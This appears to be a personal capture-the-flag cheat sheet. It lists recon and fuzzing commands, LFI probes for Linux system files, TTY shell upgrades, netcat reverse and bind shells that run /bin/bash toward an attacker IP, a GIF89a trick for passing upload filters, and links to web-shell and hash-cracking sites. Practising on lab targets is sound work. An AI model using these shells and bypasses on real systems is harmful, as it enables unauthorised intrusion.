CTF
General
ping
curl
nmap - init
nmap - full
hping3
enum4linux
create wordlist
curl http://11.22.33.44 | grep -oE '\w+' | sort -u -f > wordlist.lst
awk 'length($0) > 3 ' wordlist.lst > wordlist_gt3.lst
gobuster
gobuster dir --url <IP> -w /usr/share/wordlists/dirb/big.txt -b 404 -k -f -x php
gobuster dir --url <IP> --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
gobuster dir --url <IP>:7125 --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php,html -t 30 -k | tee gobuster_7125.raw.md
wfuzz
# === fuzz directories
wfuzz -c -z file,/usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-directories.txt --hc 404 "$URL/FUZZ"
# === fuzz files
wfuzz -c -z file,/usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-words.txt --hc 404 "$URL/FUZZ"
# === fuzz parameters
wfuzz -c -z file,/usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt --hc 302,404 "$URL?FUZZ"
# === fuzz users
wfuzz -c -z file,/usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt --hc 404,403 "$URL?user=FUZZ"
# === linux files
wfuzz -c -z file,'/usr/share/wordlists/payloadsAllTheThings/File Inclusion/Intruders/Linux-files.txt' --hw 0 "$(target)/console/file.php?file=FUZZ"
wfuzz -c -z file,'/usr/share/wordlists/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt' --hw 0 "$(target)/console/file.php?file=FUZZ"
feroxbuster
feroxbuster --url http://$(target)/ -o feroxbuster_80.txt -e -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
ffuf
ffuf -w /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt -X POST -d '{"key":"value"}' -u http://$(target):8081/api/FUZZ -fw 2
autorecon
python local server
Other
spawning tty shell
python -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
CTRL+Z
stty raw -echo; fg
stty rows 38 columns 116
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
CTRL+Z
stty raw -echo; fg
stty rows 38 columns 116
netcat nc shell
ATTACKER: netcat -lvnp 4444
TARGET: netcat 10.18.9.175 4444 -e /bin/bash
--
TARGET: netcat -lvp 4444 -e /bin/bash
ATTACKER: netcat 10.10.161.83 4444
funny User-Agent
GIF89a; header
GIF89a is the magic string at the start of a GIF file. If uploaded content is scanned, the check can sometimes be fooled by placing this header at the top of the payload (an upload filter that only inspects the first bytes accepts it as an image).
links
- https://gtfobins.github.io/
- https://lolbas-project.github.io/
- https://www.revshells.com/
- https://pentestmonkey.net
- https://pentestmonkey.net/tools/web-shells/php-reverse-shell
- https://gchq.github.io/CyberChef/
- https://www.guballa.de/vigenere-solver
- https://copy.sh/brainfuck/
- https://crackstation.net/
- https://hashes.com/en/decrypt/hash
- https://chmod-calculator.com/
- https://github.com/tomnomnom/assetfinder
- https://github.com/tomnomnom/httprobe
- https://github.com/tomnomnom/waybackurls